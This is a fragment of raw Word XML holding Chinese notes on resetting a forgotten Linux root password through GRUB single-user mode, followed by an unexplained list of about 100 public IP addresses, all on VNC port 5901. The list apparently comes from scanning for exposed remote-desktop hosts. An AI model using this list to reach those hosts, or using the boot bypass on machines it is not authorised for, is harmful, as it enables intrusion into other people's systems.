          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”键，重新引导系统。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入到系统后就可以用熟悉的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>passwd root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来更改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的密码了。改完后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reboot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法二</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>今天要测试一个程序，就启动自己虚拟机上的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>centos5.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码忘记无法使用，真是急死人了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>还好从网上找到解决办法，我摘录整理如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>GRUB:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在引导装载程序菜单上，键入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[e]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来进入编辑模式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你会看到一个引导项目列表。找到其中类似以下输出的句行：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">kernel /vmlinuz-2.6.18-0.4 ro root=/dev/hda2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按箭头键直到这一行被突出显示，然后再按</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[e]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你现在可在文本结尾处按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空格</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再输入：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>single</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后回车，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来告诉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GRUB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引导单用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你会被带回到编辑模式屏幕，从这里，按</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[b]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> GRUB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就会引导单用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结束载入后，你会看到一个与以下相似的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">sh-2.05# </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在，你便可以改变根命令，键入：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">bash# passwd root </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你会被要求重新键入口令来校验。结束后，口令就会被改变，你便可以在提示下键入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">reboot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来重新引</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00B75281" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>导；然后，象平常一样登录为根用户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="002F5922" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.16.50.148:5901      </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.16.50.149:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.16.50.150:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.16.252.75:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.16.18.71:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.19.28.137:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.4.115.71:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.4.117.28:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.4.116.152:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.4.117.26:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.4.116.157:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.4.116.156:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.197.4.21:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.197.85.134:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.197.4.21:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.197.93.91:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.197.230.184:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.197.230.172:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">120.197.235.5:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.197.230.168:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.197.230.162:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.139.4.26:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.140.2.123:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.140.148.140:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.141.137.13:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.29.152:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.29.133:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.29.148:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.29.134:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.29.142:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.29.156:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.29.135:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.140.189.6:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.29.158:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.105.134:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.105.14:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.134.137:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.139.178:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.146.94:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.200.79:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">211.142.200.80:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.200.42:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.139.119.94:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.143.239.163:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.52.251.144:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.52.251.139:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.52.251.143:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.5:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.2:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.9:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.7:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.8:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.4:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.10:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.3:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.6:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.204.249.97:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.90.218.68:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.91:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.199:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.197:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.195:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">175.6.2.198:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.196:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">223.82.245.150:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">223.82.245.151:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.68.231.165:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.18.177.91:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.26.81.61:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.39.149.200:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.26.151.238:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.26.37.233:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.49.58.148:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.59.134.221:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.59.134.222:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.185.40.146:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.210.206.237:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.216.223.107:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.216.221.174:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.216.232.155:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.216.236.83:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.216.241.66:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.216.240.14:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">58.220.228.106:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.221.92.243:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.246.22.54:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.246.226.116:5901 </w:t>
      </w:r>
    </w:p>
